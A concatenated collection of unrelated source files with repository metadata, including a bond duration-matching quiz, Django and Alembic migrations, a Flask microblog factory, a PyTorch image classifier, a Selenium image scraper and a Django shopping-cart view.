    """Assuming the same liabilities as the previous questions (i.e. a sequence of 3 liabilities of 100,000, 200,000 and 300,000 that are 3, 5
    and 10 years away, respectively), build a Duration Matched Portfolio of B2 and B3 to match the liabilities.
    What is the weight of B2 in this portfolio?"""
    liabilities = pd.Series(data=[100000, 200000, 300000], index=[3, 5, 10])
    # NOTE(review): B2 is described as a 6% coupon bond but the cash flows
    # are built with a .05 coupon here -- confirm against the quiz setup.
    short_bond = erk.bond_cash_flows(5, 1000, .05, 4)
    long_bond = erk.bond_cash_flows(10, 1000, .05, 1)
    w_s = erk.match_durations(liabilities, short_bond, long_bond, 0.05)
    print("Q10: Assuming the same liabilities as the previous questions (i.e. a sequence of 3 liabilities of 100,000, 200,000 and 300,000 that are "
          "3, 5 and 10 years away, respectively), build a Duration Matched Portfolio of B2 and B3 to match the liabilities."
          "What is the weight of B2 in this portfolio? {}".format(w_s))
# Run the quiz questions; most are commented out after being answered once.
question_1_2_3()
# question_4_5_6()
# question_7()
# question_8()
# question_9()
question_10()
| [
"nahlaerrakik@users.noreply.github.com"
] | nahlaerrakik@users.noreply.github.com |
6a7998e2475101c807b102b33e8cb9922406c1bd | 5e10b4c8f12dba924d9618ed82267f5555568fba | /mysite/blog/migrations/0001_initial.py | fb48db1e69a37c999c5a347b2377b315be719986 | [] | no_license | curiosityandlearn/djangoBlog | 2ef0d6eb4ed7e8704c09c807b6c422534439c6e4 | 8e15f6676a9fe2ad08c8fe88adf78be341cbd12b | refs/heads/master | 2020-04-28T09:41:12.370560 | 2015-06-26T14:23:47 | 2015-06-26T14:23:47 | 38,052,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 904 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration: create the blog Post model."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                # NOTE(review): 'publiched_date' is a typo for 'published_date';
                # fixing it requires a follow-up RenameField migration, not an
                # edit here (applied migrations must stay immutable).
                ('publiched_date', models.DateTimeField(null=True, blank=True)),
                ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"curiosityandlearn@gmail.com"
] | curiosityandlearn@gmail.com |
20e94e2b9699fa44a90ebd86bf6adeda21a4cc2d | 6a98e451fe0bbec1cb09b76b619c0659f9a65553 | /microblog/app/__init__.py | 80f44de0b955529f504a7f42a039bce1137ee931 | [] | no_license | ys-office-llc/blog.miguelgrinberg.com-post-the-flask-mega-tutorial | 498859e699dc74d500ade64e759aa079a657c52d | e63757929bdcb5fec1e66b56a49af19f04a4eec9 | refs/heads/main | 2023-08-30T22:11:21.550996 | 2021-10-16T12:34:24 | 2021-10-16T12:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,318 | py | import logging
from logging.handlers import SMTPHandler, RotatingFileHandler
import os
import urllib3
from flask import Flask, request, current_app
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from flask_mail import Mail
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_babel import Babel, lazy_gettext as _l
from elasticsearch import Elasticsearch
from redis import Redis
import rq
from config import Config
urllib3.disable_warnings()
db = SQLAlchemy()
migrate = Migrate()
login = LoginManager()
login.login_view = 'auth.login'
login.login_message = _l('Please log in to access this page.')
mail = Mail()
bootstrap = Bootstrap()
moment = Moment()
babel = Babel()
def create_app(config_class=Config):
    """Application factory: build and fully configure a Flask app instance.

    :param config_class: configuration object/class loaded via from_object
                         (defaults to the project's Config)
    :return: the configured Flask application
    """
    app = Flask(__name__)
    app.config.from_object(config_class)

    # Redis connection plus an RQ queue used for background tasks.
    app.redis = Redis.from_url(app.config['REDIS_URL'])
    app.task_queue = rq.Queue('microblog-tasks', connection=app.redis)

    # Bind the module-level extension singletons to this app instance.
    db.init_app(app)
    migrate.init_app(app, db)
    login.init_app(app)
    mail.init_app(app)
    bootstrap.init_app(app)
    moment.init_app(app)
    babel.init_app(app)

    # Full-text search client; only created when URL and both credentials are set.
    app.elasticsearch = Elasticsearch([app.config['ELASTICSEARCH_URL']], verify_certs=False, http_auth=(app.config['ELASTICSEARCH_USER'], app.config['ELASTICSEARCH_PASSWORD'])) \
        if app.config['ELASTICSEARCH_URL'] and app.config['ELASTICSEARCH_USER'] and app.config['ELASTICSEARCH_PASSWORD'] else None

    # Blueprints: error handlers, auth (under /auth), main pages, REST API (under /api).
    # Imported here (not at module top) to avoid circular imports with the app package.
    from app.errors import bp as errors_bp
    app.register_blueprint(errors_bp)

    from app.auth import bp as auth_bp
    app.register_blueprint(auth_bp, url_prefix='/auth')

    from app.main import bp as main_bp
    app.register_blueprint(main_bp)

    from app.api import bp as api_bp
    app.register_blueprint(api_bp, url_prefix='/api')

    # Production-only logging: email unhandled errors to the admins and keep a
    # rotating local log file. Skipped in debug and testing modes.
    if not app.debug and not app.testing:
        if app.config['MAIL_SERVER']:
            auth = None
            if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:
                auth = (app.config['MAIL_USERNAME'],
                        app.config['MAIL_PASSWORD'])
            secure = None
            if app.config['MAIL_USE_TLS']:
                secure = ()  # empty tuple enables TLS with default parameters
            mail_handler = SMTPHandler(
                mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),
                fromaddr='no-reply@' + app.config['MAIL_SERVER'],
                toaddrs=app.config['ADMINS'], subject='Microblog Failure',
                credentials=auth, secure=secure)
            mail_handler.setLevel(logging.ERROR)  # only ERROR and above are emailed
            app.logger.addHandler(mail_handler)

        if not os.path.exists('logs'):
            os.mkdir('logs')
        file_handler = RotatingFileHandler('logs/microblog.log',
                                           maxBytes=10240, backupCount=10)
        file_handler.setFormatter(logging.Formatter(
            '%(asctime)s %(levelname)s: %(message)s '
            '[in %(pathname)s:%(lineno)d]'))
        file_handler.setLevel(logging.INFO)
        app.logger.addHandler(file_handler)

        app.logger.setLevel(logging.INFO)
        app.logger.info('Microblog startup')

    return app
@babel.localeselector
def get_locale():
    """Pick the best UI language for this request from its Accept-Language header."""
    supported = current_app.config['LANGUAGES']
    return request.accept_languages.best_match(supported)
from app import models
| [
"yusuke.sato@ys-office.me"
] | yusuke.sato@ys-office.me |
d35eed3fc5562b006b34fe5a7bc089ab8a52cc90 | 38aeab93e1d0abe9ce721e368a2e2da7174b34e6 | /data_pipeline/versions/2a51dc98ea0e_create_tags_table.py | 455bc3bb1d4caffa97f1a1939678f37b6cf2db36 | [] | no_license | DupSteGu-Enterprises/data-pipeline | eedccb2590bbcd680acb23bc79c34a204550f4c2 | 4a513c63d7a2ad62105e787e90b4afdbe2b6fcef | refs/heads/master | 2016-09-06T09:10:10.789744 | 2014-08-30T20:57:19 | 2014-08-30T20:57:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | """Create tags table
Revision ID: 2a51dc98ea0e
Revises: 425a54a5c9dc
Create Date: 2014-07-24 00:00:59.607487
"""
# revision identifiers, used by Alembic.
revision = '2a51dc98ea0e'
down_revision = '425a54a5c9dc'
from alembic import op
import sqlalchemy as sa
from settings import db_settings as db
def upgrade():
    """Apply this revision: create the tag table (integer id PK, title text)."""
    columns = [
        sa.Column('id', sa.Integer, primary_key=True),
        sa.Column('title', sa.String, nullable=False),
    ]
    op.create_table(db.TAG_TABLE, *columns)
def downgrade():
    """Revert this revision: drop the tag table."""
    op.drop_table(db.TAG_TABLE)
| [
"njdupoux1994@gmail.com"
] | njdupoux1994@gmail.com |
31079aaed58856c6109af0706b28d5557bb6070f | c3e111ae34f7d97807ce1ae77241fa59928fd910 | /class2assignment1/F.py | cb40d9871c5b144ed7286b331f2b0ebce04c6390 | [] | no_license | wittydavid/devops0605 | 9cd8e187441d7ceb29a6fbe23efc49f61c0f002d | 0f92f8955785c66712d00f4756678f2ea6814028 | refs/heads/main | 2023-07-13T01:46:05.804742 | 2021-08-27T17:56:35 | 2021-08-27T17:56:35 | 384,684,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | phone_num = input("Enter phone number: ")
print(f"phone number: {phone_num}")
| [
"davidaskarian.tech@gmail.com"
] | davidaskarian.tech@gmail.com |
39b6d4bdb8972b192e3c2f9e4922aa5315e5816a | 11051f27837d449e828d73e8a9dad9deb2b9d457 | /Anime_attribute_discrimination/rori_or_other/rori_or_other_mynn.py | 99e4fc9399d56343bad30592aa9c0845b398133f | [] | no_license | KobayashiRui/pytorch_practice | 08707294ffa0d44269fcb8134c7fad1413fb781a | 8daba8ae4cd8e66db1bdd1feaacadb65b9aa63ca | refs/heads/master | 2020-07-04T13:40:05.271838 | 2019-12-23T05:04:00 | 2019-12-23T05:04:00 | 202,299,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,719 | py | import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.optim import lr_scheduler
from torch.autograd import Variable
import torchvision
from torchvision import transforms, datasets, models
import matplotlib.pyplot as plt
import numpy as np
def imshow(images, title=None):
    """Un-normalize an ImageNet-normalized image tensor and show it with matplotlib.

    `images` is a CHW tensor (e.g. a torchvision grid); `title` is optional.
    """
    mean = np.array([0.485, 0.456, 0.406])
    std = np.array([0.229, 0.224, 0.225])
    img = images.numpy().transpose((1, 2, 0))  # CHW -> HWC for matplotlib
    img = np.clip(std * img + mean, 0, 1)      # undo Normalize, clamp to [0, 1]
    plt.imshow(img)
    if title is not None:
        plt.title(title)
    plt.show()
# Train the model for one epoch on the training data
def train(train_loader):
    """Run one training epoch over *train_loader* and return the mean batch loss.

    Relies on the module-level globals model_ft, criterion, optimizer and use_gpu.
    """
    model_ft.train()
    running_loss = 0
    # torch.autograd.Variable has been a deprecated no-op since PyTorch 0.4
    # (this file already uses 0.4+ APIs such as loss.item()), so tensors are
    # used directly; only the device placement is kept.
    for images, labels in train_loader:
        if use_gpu:
            images = images.cuda()
            labels = labels.cuda()
        optimizer.zero_grad()
        outputs = model_ft(images)
        loss = criterion(outputs, labels)
        running_loss += loss.item()
        loss.backward()
        optimizer.step()
    train_loss = running_loss / len(train_loader)
    return train_loss
# Evaluate loss/accuracy on the test data
def valid(test_loader):
    """Evaluate the model on *test_loader*; return (mean batch loss, accuracy).

    Relies on the module-level globals model_ft, criterion and use_gpu.
    """
    model_ft.eval()
    running_loss = 0
    correct = 0
    total = 0
    # The 'volatile=True' Variable flag was removed in PyTorch 0.4; the
    # supported way to disable autograd during evaluation is torch.no_grad().
    with torch.no_grad():
        for images, labels in test_loader:
            if use_gpu:
                images = images.cuda()
                labels = labels.cuda()
            outputs = model_ft(images)
            loss = criterion(outputs, labels)
            running_loss += loss.item()
            _, predicted = torch.max(outputs.data, 1)
            correct += (predicted == labels.data).sum()
            total += labels.size()[0]
    val_loss = running_loss / len(test_loader)
    val_acc = float(correct) / float(total)
    return (val_loss, val_acc)
class Net(nn.Module):
    """Small CNN classifier: three conv/BN/ReLU/maxpool stages + two FC layers.

    Expects 3x224x224 inputs; after three 2x2 poolings the feature map is
    64x28x28 = 50176 values, which feeds the classifier head (2 classes).
    """

    def __init__(self):
        super(Net, self).__init__()
        self.layer1 = nn.Sequential(
            nn.Conv2d(3, 16, kernel_size=5, padding=2),
            nn.BatchNorm2d(16),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        self.layer2 = nn.Sequential(
            nn.Conv2d(16, 32, kernel_size=5, padding=2),
            nn.BatchNorm2d(32),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        self.layer3 = nn.Sequential(
            nn.Conv2d(32, 64, kernel_size=5, padding=2),
            nn.BatchNorm2d(64),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        self.fc = nn.Linear(50176, 5000)
        self.fc2 = nn.Linear(5000, 2)

    def forward(self, x):
        # Convolutional feature extractor.
        for stage in (self.layer1, self.layer2, self.layer3):
            x = stage(x)
        # Flatten, then classify; dropout is active only in training mode.
        x = x.view(x.size(0), -1)
        x = F.dropout(self.fc(x), training=self.training)
        return self.fc2(x)
# Data augmentation + ImageNet normalization for training; plain normalization
# for evaluation. The commented-out transforms are earlier experiments.
data_transform = {
    'train': transforms.Compose([
        #transforms.RandomResizedCrop(224),
        transforms.RandomHorizontalFlip(),
        #transforms.RandomVerticalFlip(),
        transforms.RandomRotation((-60,60)),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.485,0.456,0.406],std=[0.229,0.224,0.225]),
    ]),
    'val': transforms.Compose([
        #transforms.RandomResizedCrop(224),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.485,0.456,0.406],std=[0.229,0.224,0.225]),
    ])
}
# Load the training data.
hymenoptera_dataset = datasets.ImageFolder(root='rori_or_other_dataset/train',
                                           transform=data_transform['train'])
dataset_loader = torch.utils.data.DataLoader(hymenoptera_dataset,
                                             batch_size=4, shuffle=True,
                                             num_workers=4)
# Load the test data.
hymenoptera_testset = datasets.ImageFolder(root='rori_or_other_dataset/test',transform=data_transform['val'])
dataset_testloader = torch.utils.data.DataLoader(hymenoptera_testset, batch_size=4,shuffle=False, num_workers=4)
classes = ('other','rori')
# Show one augmented batch as a sanity check.
images, classes_nam = next(iter(dataset_loader))
print(images.size(), classes_nam.size()) # torch.Size([4, 3, 224, 224]) torch.Size([4])
images = torchvision.utils.make_grid(images)
imshow(images, title=[classes[x] for x in classes_nam])
# Build the model.
# (Stale note from a pretrained-model variant: a stock backbone ends in a
# 1000-class head; Net() here already outputs 2 classes.)
model_ft = Net()
#for param in model_ft.parameters():
#    param.requires_grad = False
use_gpu = torch.cuda.is_available()
num_epochs = 100
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model_ft.parameters(), lr=0.0001)
#optimizer = optim.SGD(model_ft.parameters(), lr=0.01, momentum=0.9)
#scheduler = lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)
if use_gpu:
    model_ft.cuda()
    print("use cuda!!")
# Training loop: one train pass + one validation pass per epoch.
loss_list = []
val_loss_list = []
val_acc_list =[]
for epoch in range(num_epochs):
    loss = train(dataset_loader)
    val_loss, val_acc = valid(dataset_testloader)
    print('epoch : {}, loss : {:.4f}, val_loss : {:.4f}, val_acc : {:.4f}'.format(epoch,loss,val_loss, val_acc))
    #print("epoch : {}, loss : {:.4f}".format(epoch,loss))
    # Record history for plotting below.
    loss_list.append(loss)
    val_loss_list.append(val_loss)
    val_acc_list.append(val_acc)
# Save trained weights and plot the loss curves.
torch.save(model_ft.state_dict(),'mynn_weight2.pth')
plt.plot(range(num_epochs),loss_list,label="train_loss")
plt.plot(range(num_epochs),val_loss_list,label="val_loss")
plt.legend()
plt.show()
| [
"roboroborx782@gmail.com"
] | roboroborx782@gmail.com |
52244361d65a0612cfd41b312c743cd3c84bf8a7 | 5c81d1c58998377697301a578de3903c4e679e28 | /src/create_db.py | f8cde49b003e19ea080c99ad2074d55ef8b1f9ee | [] | no_license | evasolal/ReigoDocker | 6305148cc4ee7ec73373e2bcda494bba122bcbdd | 309a05636ae5c33b7e5e627f4a51bc35f4216916 | refs/heads/main | 2023-04-23T20:00:57.815519 | 2021-05-12T12:04:01 | 2021-05-12T12:04:01 | 366,430,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,869 | py | import sqlite3
from sqlite3 import Error
def create_connection(db_file):
    """Create a database connection to the SQLite database at *db_file*.

    :param db_file: path to the database file (":memory:" for an in-memory DB)
    :return: sqlite3.Connection on success, None on failure (error is printed)
    """
    # The original assigned conn = None, returned inside the try, and then
    # had a second unreachable-on-success `return conn`; this collapses the
    # duplicated return paths while keeping the same success/failure results.
    try:
        return sqlite3.connect(db_file)
    except Error as e:
        print(e)
        return None
def create_table(conn, create_table_sql):
    """Execute a CREATE TABLE statement on *conn*, printing any sqlite error.

    :param conn: open sqlite3 Connection
    :param create_table_sql: full CREATE TABLE statement to run
    """
    try:
        cursor = conn.cursor()
        cursor.execute(create_table_sql)
    except Error as err:
        print(err)
def main():
    """Create (or open) addresses.db and ensure the 'address' table exists."""
    database = "addresses.db"

    sql_create_address_table = """ CREATE TABLE IF NOT EXISTS address (
                id integer PRIMARY KEY,
                ADDRESS text NOT NULL,
                BEDROOMS float,
                BATHROOMS float,
                SIZE integer,
                SOLD_ON text,
                ZESTIMATE text,
                WALK_SCORE integer,
                TRANSIT_SCORE integer,
                GREAT_SCHOOLS float,
                UNIQUE(ADDRESS)
            );"""

    conn = create_connection(database)
    # Create the table only when the connection succeeded.
    if conn is None:
        print("Error! cannot create the database connection.")
    else:
        create_table(conn, sql_create_address_table)


if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | evasolal.noreply@github.com |
d52d59665cb3b59e68269b407fe65d6b94b3f230 | 7891d4ece938533e13872506b0d93b3669cbd29f | /ImageDownload.py | 6c188df46e7a0dd4a9950500227fe2fa10e3abdc | [] | no_license | nimishbansal/ImageDownloader | 42ef6513a0d58d9a0ca331709384c2f8bc11d278 | 94bcfa5223591a1fd5041e87aa07cb13a8e5e911 | refs/heads/master | 2020-05-29T21:59:05.701937 | 2019-05-30T10:59:47 | 2019-05-30T10:59:47 | 189,398,104 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,928 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import os
import requests
import threading
import pygame
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import pyqtSignal,QObject
def downloadImage(url, counter, keyword="None"):
    """Download *url* into the hard-coded local images directory.

    The file is saved as <keyword><counter><original extension>. Any failure
    is swallowed and reported via print (original behavior kept).

    :param url: direct image URL (must contain a '.' for the extension)
    :param counter: index appended to the file name
    :param keyword: search keyword used as the file-name prefix
    """
    # BUG FIX: `import urllib` alone does not make the `urllib.request`
    # submodule available; it must be imported explicitly.
    import urllib.request
    ext = url[url.rindex("."):]  # renamed from `format`, which shadowed a builtin
    try:
        urllib.request.urlretrieve(
            url, "/home/nimish/Documents/images/" + keyword + str(counter) + ext)
    except Exception:
        print("Error in downloadImage function")
class myListWithSignal(QObject):
    """List-like QObject that emits downloadSignal whenever an item is appended."""

    downloadSignal = pyqtSignal()

    def __init__(self):
        super(myListWithSignal, self).__init__()
        self.myInternalList = []

    def append(self, item):
        """Store *item* and notify any connected slots."""
        self.myInternalList.append(item)
        self.downloadSignal.emit()

    def getLastElement(self):
        """Return the most recently appended item."""
        return self.myInternalList[-1]
class Process():
    """Scrapes Google Images with Selenium and downloads the first few hits.

    Depends on the live google.co.in markup (hard-coded CSS class names) and a
    local chromedriver path, so it is fragile against site/driver changes.
    """

    def __init__(self, keyword, count=10, parent=None):
        self.driver = None
        self.keyword = keyword
        self.myUrls = []          # direct image URLs collected so far
        self.parent = parent
        self.myElements1 = None
        # NOTE(review): `count` is accepted but never used; the number of
        # downloads is hard-coded to 10 in startProcess.

    def startProcess(self):
        """Search Google Images for self.keyword and download the first 10
        full-size images, each in a background thread."""
        self.driver = webdriver.Chrome("/home/nimish/PycharmProjects/so/internship/macroproject/chromedriver")
        self.driver.get("http://google.co.in/images")
        self.driver.find_element_by_css_selector(".gLFyf.gsfi").send_keys(self.keyword + Keys.RETURN)
        time.sleep(3)
        self.myElements = self.driver.find_elements_by_tag_name("img")
        self.myElements1 = list(filter(lambda i: i.get_attribute('class') == 'rg_ic rg_i', self.myElements))
        mainUrl = self.driver.current_url
        try:
            for j in range(10):
                # Re-query the thumbnails every iteration: the DOM changes
                # after each click.
                self.myElements = self.driver.find_elements_by_tag_name("img")
                self.myElements1 = list(filter(lambda i: i.get_attribute('class') == 'rg_ic rg_i', self.myElements))
                self.myElements1[j].click()
                try:
                    viewImageButton = self.driver.find_elements_by_css_selector(".irc_fsl.i3596")
                except:
                    print("viewImageButton not found")
                # time.sleep(1)
                for i in range(len(viewImageButton)):
                    if (viewImageButton[i].text == 'View image'):
                        self.myUrls.append(viewImageButton[i].get_attribute('href'))
                        # BUG FIX: self.myUrls is a plain list, which has no
                        # getLastElement() method (the original call raised an
                        # AttributeError that the outer except silently printed).
                        self.lastThread = threading.Thread(
                            target=downloadImage,
                            args=(self.myUrls[-1], j, self.keyword))
                        self.lastThread.start()
                        break
            # NOTE(review): only the last-started thread is joined; earlier
            # downloads may still be running when onFinish() plays the sound.
            self.lastThread.join()
            self.driver.quit()
            self.onFinish()
        except Exception as E:
            print(E)

    def onFinish(self):
        """Play a notification sound once the scraping run completes."""
        pygame.init()
        pygame.mixer.music.load("sound.mp3")
        pygame.mixer.music.play()
if __name__=="__main__":
classobject=Process("company_logo",10,None)
classobject.startProcess()
| [
"noreply@github.com"
] | nimishbansal.noreply@github.com |
8599015f37a249c596af3f4c0e0ef8c100111f87 | d7049d63e791a257cf2685bbfd03cf5196d5f640 | /Courses_PatrickL_Christine_Ronald_Kennedy_JohnEboh/apps/courseAssign/apps.py | 00d815ad80a9b24b04c7f546d64d4f3ec5bb74ab | [] | no_license | dancinturtle/coursesFeb17 | e4825d98d02fe85477f5d4a6a1286e728c35b080 | c17f9a26c802af93fd9423ae79a33d425cf3f75c | refs/heads/master | 2021-01-19T12:48:47.517891 | 2017-02-22T03:23:56 | 2017-02-22T03:23:56 | 82,342,427 | 0 | 26 | null | 2017-02-22T19:12:56 | 2017-02-17T22:09:49 | Python | UTF-8 | Python | false | false | 140 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class CourseassignConfig(AppConfig):
    """Django application configuration for the courseAssign app."""

    name = 'courseAssign'
| [
"pleung1987@gmail.com"
] | pleung1987@gmail.com |
a86a7a429a1c481e2685f5caf34c0993ec1fc365 | 8b3d00f7c0029a4974a5df2072ea21649d2b8829 | /dev/phSensor.py | 667d8504029009b66e6cf7bf3dbfbbfc711c7daa | [
"MIT"
] | permissive | dasTholo/pysmartnode | 29dd521b5f5374456b4300ec19b1c4bdf45a5dca | 90b0ae05e307433c4a904017902ffadd13835cef | refs/heads/master | 2021-01-05T02:41:45.897597 | 2020-02-18T16:08:34 | 2020-02-18T16:08:34 | 240,849,533 | 0 | 0 | MIT | 2020-02-18T19:37:13 | 2020-02-16T07:23:49 | Python | UTF-8 | Python | false | false | 5,269 | py | # Author: Kevin Köck
# Copyright Kevin Köck 2019 Released under the MIT license
# Created on 2019-05-11
"""
example config:
{
package: .sensors.phSensor
component: PHsensor
constructor_args: {
adc: 22 # ADC object/pin number
adc_multi: 1.52 # ADC multiplicator when using voltage divider (needed on esp when sensor probe not connected as voltage goes to 5V then)
precision: 2 # precision of the pH value published
voltage_calibration_0: 2.54 # voltage at pH value #0
pH_calibration_value_0: 6.86 # pH value for calibration point #0
voltage_calibration_1: 3.04 # voltage at pH value #1
pH_calibration_value_1: 4.01 # pH value for calibration point #1
# interval: 600 # optional, defaults to 600. -1 means do not automatically read sensor and publish values
# mqtt_topic: sometopic # optional, defaults to home/<controller-id>/PHsensor
# friendly_name: null # optional, friendly name shown in homeassistant gui with mqtt discovery
}
}
Inspiration from: https://scidle.com/how-to-use-a-ph-sensor-with-arduino/
Example measurements:
situation, real, esp
shorted, 2.61 2.5
destilled 2.73 2.6
ph4.01 3.14 3.0
ph6.86 2.68 2.53
growing solution 3.24 3.1 (this is very wrong.., ph actually ~5.2)
"""
__updated__ = "2019-11-01"
__version__ = "0.6"
from pysmartnode import config
from pysmartnode.components.machine.adc import ADC
from pysmartnode import logging
import uasyncio as asyncio
from pysmartnode.utils.component import Component
import gc
COMPONENT_NAME = "PHsensor"
_COMPONENT_TYPE = "sensor"
_log = logging.getLogger(COMPONENT_NAME)
_mqtt = config.getMQTT()
gc.collect()
_unit_index = -1
PH_TYPE = '"unit_of_meas":"pH",' \
'"val_tpl":"{{ value|float }}",' \
'"ic":"mdi:alpha-p-circle-outline"'
_VAL_T_ACIDITY = "{{ value|float }}"
class PHsensor(Component):
    """pysmartnode component reading an analog pH probe through an ADC.

    Converts the measured voltage to pH with a linear two-point calibration
    and publishes the value over MQTT, optionally on a periodic loop.
    """

    def __init__(self, adc, adc_multi, voltage_calibration_0, pH_calibration_value_0,
                 voltage_calibration_1, pH_calibration_value_1,
                 precision=2, interval=None, mqtt_topic=None,
                 friendly_name=None, discover=True):
        # This makes it possible to use multiple instances of MySensor
        global _unit_index
        _unit_index += 1
        super().__init__(COMPONENT_NAME, __version__, _unit_index, discover)
        self._interval = interval or config.INTERVAL_SENSOR_PUBLISH
        self._topic = mqtt_topic
        self._frn = friendly_name
        self._adc = ADC(adc)          # ADC wrapper accepting a pin number or ADC object
        self._adc_multi = adc_multi   # multiplier compensating for a voltage divider
        self.__ph = None              # last reading cached by the polling loop
        self._prec = int(precision)
        # Two-point linear calibration: (voltage, pH) pairs.
        self._v0 = voltage_calibration_0
        self._v1 = voltage_calibration_1
        self._ph0 = pH_calibration_value_0
        self._ph1 = pH_calibration_value_1
        gc.collect()
        if self._interval > 0:  # if interval==-1 no loop will be started
            asyncio.get_event_loop().create_task(self._loop())

    async def _loop(self):
        """Periodically read the sensor, caching (and publishing) the value."""
        interval = self._interval
        while True:
            self.__ph = await self._read()
            await asyncio.sleep(interval)

    async def _discovery(self, register=True):
        """Register (or remove) this sensor with Home Assistant MQTT discovery."""
        name = "{!s}{!s}".format(COMPONENT_NAME, self._count)
        if register:
            await self._publishDiscovery(_COMPONENT_TYPE, self.acidityTopic(), name, PH_TYPE,
                                         self._frn or "pH")
        else:
            await self._deleteDiscovery(_COMPONENT_TYPE, name)

    async def _read(self, publish=True, timeout=5) -> float:
        """Sample the ADC, convert voltage to pH and optionally publish it.

        Takes 10 samples 50ms apart, discards the two highest and two lowest,
        and averages the rest before applying the linear calibration.
        Returns None when the result is implausible (pH > 14, probe likely
        not connected).
        """
        buf = []
        for _ in range(10):
            buf.append(self._adc.readVoltage() * self._adc_multi)
            await asyncio.sleep_ms(50)
        # Outlier rejection: drop the two largest and two smallest samples.
        buf.remove(max(buf))
        buf.remove(max(buf))
        buf.remove(min(buf))
        buf.remove(min(buf))
        v = 0
        for i in range(len(buf)):
            v += buf[i]
        v /= len(buf)
        # Straight line through the two calibration points: pH = m*U + b.
        ph1 = self._ph1
        ph0 = self._ph0
        v0 = self._v0
        v1 = self._v1
        m = (ph1 - ph0) / (v1 - v0)
        b = (ph0 * v1 - ph1 * v0) / (v1 - v0)
        # NOTE(review): debug prints left in; consider removing for production.
        print("U", v)
        print("m", m)
        print("b", b)
        value = m * v + b
        value = round(value, self._prec)
        print("pH", value)
        if value > 14:  # physically impossible pH -> probe probably disconnected
            await _log.asyncLog("error",
                                "Not correctly connected, voltage {!s}, ph {!s}".format(v, value))
            return None
        if publish:
            await _mqtt.publish(self.acidityTopic(),
                                ("{0:." + str(self._prec) + "f}").format(value),
                                timeout=timeout, await_connection=False)
        return value

    async def acidity(self, publish=True, timeout=5, no_stale=False) -> float:
        """Return the pH: a fresh reading when no_stale or when no polling loop
        runs (interval == -1), otherwise the cached value from the loop."""
        if self._interval == -1 or no_stale:
            return await self._read(publish, timeout)
        return self.__ph

    @staticmethod
    def acidityTemplate():
        """Other components like HVAC might need to know the value template of a sensor"""
        return _VAL_T_ACIDITY

    def acidityTopic(self):
        """Return the MQTT topic pH values are published to (configured or default)."""
        return self._topic or _mqtt.getDeviceTopic("{!s}{!s}".format(COMPONENT_NAME, self._count))
| [
"kevinkk525@users.noreply.github.com"
] | kevinkk525@users.noreply.github.com |
c56de4ee7b33bef4406aa64f9e855ce8969ed701 | 464ba6b8119dfda26fbd77f31e600556c091147f | /store/views/cart.py | 3546861bd02ee174e562b4de5e418aa507104662 | [] | no_license | praveen9964/Tshirt-store | 5db88cf529927b3e9c1fb26ec3f19c9177394b49 | 2f9d8d3c05c555cd2c68653b543861f292cc7e9a | refs/heads/main | 2023-07-15T15:03:16.092448 | 2021-08-31T17:26:01 | 2021-08-31T17:26:01 | 401,783,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,040 | py | from django.shortcuts import render , HttpResponse, redirect
from store.forms.authforms import CustomerCreationForm,CustomerAuthForm #this is from authforms.py file
from django.contrib.auth.forms import AuthenticationForm #for built in login form
from django.contrib.auth import authenticate, login as loginUser,logout #used for login authentication
#the above authenticate,login and logout are predefined( existing by django)
from store.forms import CheckForm
from store.models import Tshirt,SizeVariant, Cart , Order , OrderItem , Payment, Occasion,IdealFor,NeckType,Sleeve,Brand,Color
from math import floor
from django.contrib.auth.decorators import login_required
def add_to_cart(request, slug, size):
    """Add one unit of the given tshirt/size to the session cart and, for a
    logged-in user, to the persistent Cart table; then redirect back to the
    page named by the 'return_url' query parameter."""
    user = request.user if request.user.is_authenticated else None
    cart = request.session.get('cart')
    if cart is None:
        cart = []
    shirt = Tshirt.objects.get(slug=slug)
    add_cart_to_anom_user(cart, size, shirt)
    if user is not None:
        add_cart_to_database(user, size, shirt)
    # Reassign so the session middleware notices the in-place mutation.
    request.session['cart'] = cart
    # NOTE(review): 'return_url' comes straight from the query string — an
    # open-redirect risk; consider validating it against allowed hosts.
    return_url = request.GET.get('return_url')
    return redirect(return_url)
def add_cart_to_database(user, size, tshirt):
    """Persist one unit of tshirt/size for *user* in the Cart table.

    Increments quantity when a row for this user and size variant already
    exists; otherwise inserts a fresh row with quantity 1.
    """
    variant = SizeVariant.objects.get(size=size, tshirt=tshirt)
    rows = Cart.objects.filter(user=user, sizeVariant=variant)
    if len(rows) > 0:
        row = rows[0]
        row.quantity += 1
        row.save()
    else:
        row = Cart(user=user, sizeVariant=variant, quantity=1)
        row.save()
